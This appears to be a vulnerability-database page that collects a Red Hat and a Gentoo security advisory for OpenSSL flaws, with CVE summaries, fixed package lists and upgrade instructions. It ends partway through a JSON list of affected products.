Synopsis: Moderate: openssl security, bug fix, and enhancement update Advisory ID: RHSA-2018:3221-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:3221 Issue date: 2018-10-30 CVE Names: CVE-2017-3735 CVE-2018-0495 CVE-2018-0732 CVE-2018-0737 CVE-2018-0739 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries (CVE-2018-0495)
-
openssl: Malicious server can send large prime to client during DH(E) TLS handshake causing the client to hang (CVE-2018-0732)
-
openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service (CVE-2018-0739)
-
openssl: Malformed X.509 IPAdressFamily could cause OOB read (CVE-2017-3735)
-
openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys (CVE-2018-0737)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.6 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1486144 - CVE-2017-3735 openssl: Malformed X.509 IPAdressFamily could cause OOB read 1548401 - modify X509_NAME comparison function to be case sensitive for CA name lists in SSL 1561266 - CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service 1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys 1585004 - ppc64le opensslconf.h is incompatible with swig 1591100 - CVE-2018-0732 openssl: Malicious server can send large prime to client during DH(E) TLS handshake causing the client to hang 1591163 - CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries 1603597 - Confusing error message when asking for invalid DSA parameter sizes in FIPS mode
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.2k-16.el7.src.rpm
x86_64: openssl-1.0.2k-16.el7.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-libs-1.0.2k-16.el7.i686.rpm openssl-libs-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-devel-1.0.2k-16.el7.i686.rpm openssl-devel-1.0.2k-16.el7.x86_64.rpm openssl-perl-1.0.2k-16.el7.x86_64.rpm openssl-static-1.0.2k-16.el7.i686.rpm openssl-static-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.2k-16.el7.src.rpm
x86_64: openssl-1.0.2k-16.el7.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-libs-1.0.2k-16.el7.i686.rpm openssl-libs-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-devel-1.0.2k-16.el7.i686.rpm openssl-devel-1.0.2k-16.el7.x86_64.rpm openssl-perl-1.0.2k-16.el7.x86_64.rpm openssl-static-1.0.2k-16.el7.i686.rpm openssl-static-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.2k-16.el7.src.rpm
ppc64: openssl-1.0.2k-16.el7.ppc64.rpm openssl-debuginfo-1.0.2k-16.el7.ppc.rpm openssl-debuginfo-1.0.2k-16.el7.ppc64.rpm openssl-devel-1.0.2k-16.el7.ppc.rpm openssl-devel-1.0.2k-16.el7.ppc64.rpm openssl-libs-1.0.2k-16.el7.ppc.rpm openssl-libs-1.0.2k-16.el7.ppc64.rpm
ppc64le: openssl-1.0.2k-16.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm openssl-devel-1.0.2k-16.el7.ppc64le.rpm openssl-libs-1.0.2k-16.el7.ppc64le.rpm
s390x: openssl-1.0.2k-16.el7.s390x.rpm openssl-debuginfo-1.0.2k-16.el7.s390.rpm openssl-debuginfo-1.0.2k-16.el7.s390x.rpm openssl-devel-1.0.2k-16.el7.s390.rpm openssl-devel-1.0.2k-16.el7.s390x.rpm openssl-libs-1.0.2k-16.el7.s390.rpm openssl-libs-1.0.2k-16.el7.s390x.rpm
x86_64: openssl-1.0.2k-16.el7.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-devel-1.0.2k-16.el7.i686.rpm openssl-devel-1.0.2k-16.el7.x86_64.rpm openssl-libs-1.0.2k-16.el7.i686.rpm openssl-libs-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):
Source: openssl-1.0.2k-16.el7.src.rpm
aarch64: openssl-1.0.2k-16.el7.aarch64.rpm openssl-debuginfo-1.0.2k-16.el7.aarch64.rpm openssl-devel-1.0.2k-16.el7.aarch64.rpm openssl-libs-1.0.2k-16.el7.aarch64.rpm
ppc64le: openssl-1.0.2k-16.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm openssl-devel-1.0.2k-16.el7.ppc64le.rpm openssl-libs-1.0.2k-16.el7.ppc64le.rpm
s390x: openssl-1.0.2k-16.el7.s390x.rpm openssl-debuginfo-1.0.2k-16.el7.s390.rpm openssl-debuginfo-1.0.2k-16.el7.s390x.rpm openssl-devel-1.0.2k-16.el7.s390.rpm openssl-devel-1.0.2k-16.el7.s390x.rpm openssl-libs-1.0.2k-16.el7.s390.rpm openssl-libs-1.0.2k-16.el7.s390x.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.2k-16.el7.aarch64.rpm openssl-perl-1.0.2k-16.el7.aarch64.rpm openssl-static-1.0.2k-16.el7.aarch64.rpm
ppc64le: openssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm openssl-perl-1.0.2k-16.el7.ppc64le.rpm openssl-static-1.0.2k-16.el7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-16.el7.s390.rpm openssl-debuginfo-1.0.2k-16.el7.s390x.rpm openssl-perl-1.0.2k-16.el7.s390x.rpm openssl-static-1.0.2k-16.el7.s390.rpm openssl-static-1.0.2k-16.el7.s390x.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.2k-16.el7.ppc.rpm openssl-debuginfo-1.0.2k-16.el7.ppc64.rpm openssl-perl-1.0.2k-16.el7.ppc64.rpm openssl-static-1.0.2k-16.el7.ppc.rpm openssl-static-1.0.2k-16.el7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm openssl-perl-1.0.2k-16.el7.ppc64le.rpm openssl-static-1.0.2k-16.el7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-16.el7.s390.rpm openssl-debuginfo-1.0.2k-16.el7.s390x.rpm openssl-perl-1.0.2k-16.el7.s390x.rpm openssl-static-1.0.2k-16.el7.s390.rpm openssl-static-1.0.2k-16.el7.s390x.rpm
x86_64: openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-perl-1.0.2k-16.el7.x86_64.rpm openssl-static-1.0.2k-16.el7.i686.rpm openssl-static-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.2k-16.el7.src.rpm
x86_64: openssl-1.0.2k-16.el7.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-devel-1.0.2k-16.el7.i686.rpm openssl-devel-1.0.2k-16.el7.x86_64.rpm openssl-libs-1.0.2k-16.el7.i686.rpm openssl-libs-1.0.2k-16.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7.i686.rpm openssl-debuginfo-1.0.2k-16.el7.x86_64.rpm openssl-perl-1.0.2k-16.el7.x86_64.rpm openssl-static-1.0.2k-16.el7.i686.rpm openssl-static-1.0.2k-16.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-3735 https://access.redhat.com/security/cve/CVE-2018-0495 https://access.redhat.com/security/cve/CVE-2018-0732 https://access.redhat.com/security/cve/CVE-2018-0737 https://access.redhat.com/security/cve/CVE-2018-0739 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.6_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBW9gQkdzjgjWX9erEAQgQZQ/8CfvagNmJ9p3eWlbk5NOClhF4mxZjzHUc j8kOWrBXKt+VsCknJJTwKOkzrljUJ/XgHo4vu/G9F6O3Oj62roWmW5OJKtlmD3xl VOhUNNmWalVsQ1i1CgI7Khf2Xq9SaMnCaTDpoTamAAznrcj7T2AGABIzPeK0+WL7 GctOtuZoC04CSUbg4z3I6KWYZAh9Id6qbYLcMYSNbTGW7FKl15GOQsu2atwwoWhg 9BA6QhEULWiob/MWcGIrZZl3Bqm2cngC+FhxklsWJ9BC0zRsCJZROBg2eYVCwW78 ZwXiS5rQCSNkmGO4GK239aSyjMmtwrZBzfLsFXz1Enp7kKle6EqnA655p4cu78I8 HXxmBOceOq7NlG3Zz4PKafmkqZMHoriIxGDgGYWxMBb2Tdk7ZerhsaA1fW9dDPIZ zNxF0LngoaZbu49DKv/Doiqcs9nsyvoYpBMeALAM1hAZRhk7o31HJS9i7O/YzuWc uL7wgtQRgyxtFXaRlleWU8pWsTx9NtpvtPiMJQzkw19UX3El5DQv+8x+hNholuZa pfA9UWrhLfYVk0ZZRzI9pYgpsEJ9Ga3TgykpM048V4+84KVDRkkLHxGM1p3rvX01 eCRYyB0VzbFhKwxdyRniBITh3e2+uaYkG7zYSX+ewXu2rOTN8uLrK87rHDliQnvS nuWE/iwTIDU= =jMog -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This issue only applied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04.
Gentoo Linux Security Advisory GLSA 201712-03
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 14, 2017 Bugs: #629290, #636264, #640172 ID: 201712-03
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which may lead to a Denial of Service condition.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2n >= 1.0.2n
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the referenced CVE identifiers for details.
Impact
A remote attacker could cause a Denial of Service condition, recover a private key in unlikely circumstances, circumvent security restrictions to perform unauthorized actions, or gain access to sensitive information.
Workaround
There are no known workarounds at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2n"
References
[ 1 ] CVE-2017-3735 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3735 [ 2 ] CVE-2017-3736 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3736 [ 3 ] CVE-2017-3737 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3737 [ 4 ] CVE-2017-3738 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3738
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201712-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--IrEhWFjxIJsFtqH1v1HHQsLm3nLmhNeP4--
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1311", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.6, "vendor": "debian", "version": "9.0" }, { "model": "linux", "scope": "eq", "trust": 1.6, "vendor": "debian", "version": "8.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8ze" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8z" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zb" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zg" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": null, "trust": 0.8, "vendor": "openssl", "version": null }, { "model": "rhev-m for servers", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3.0" }, { "model": "jboss ews", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2" }, { "model": "jboss ews", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1" }, { "model": "jboss eap", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "jboss eap", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jboss core services", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "e-business suite", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "project openssl 1.1.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.1.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.1.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.1.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.1.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.1.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.7" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.8.0.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.8" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.7.2.6" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.7.2.3" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.7.2.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.4" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.3" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.17" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.15" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.14" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.9" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.8" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.7" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": 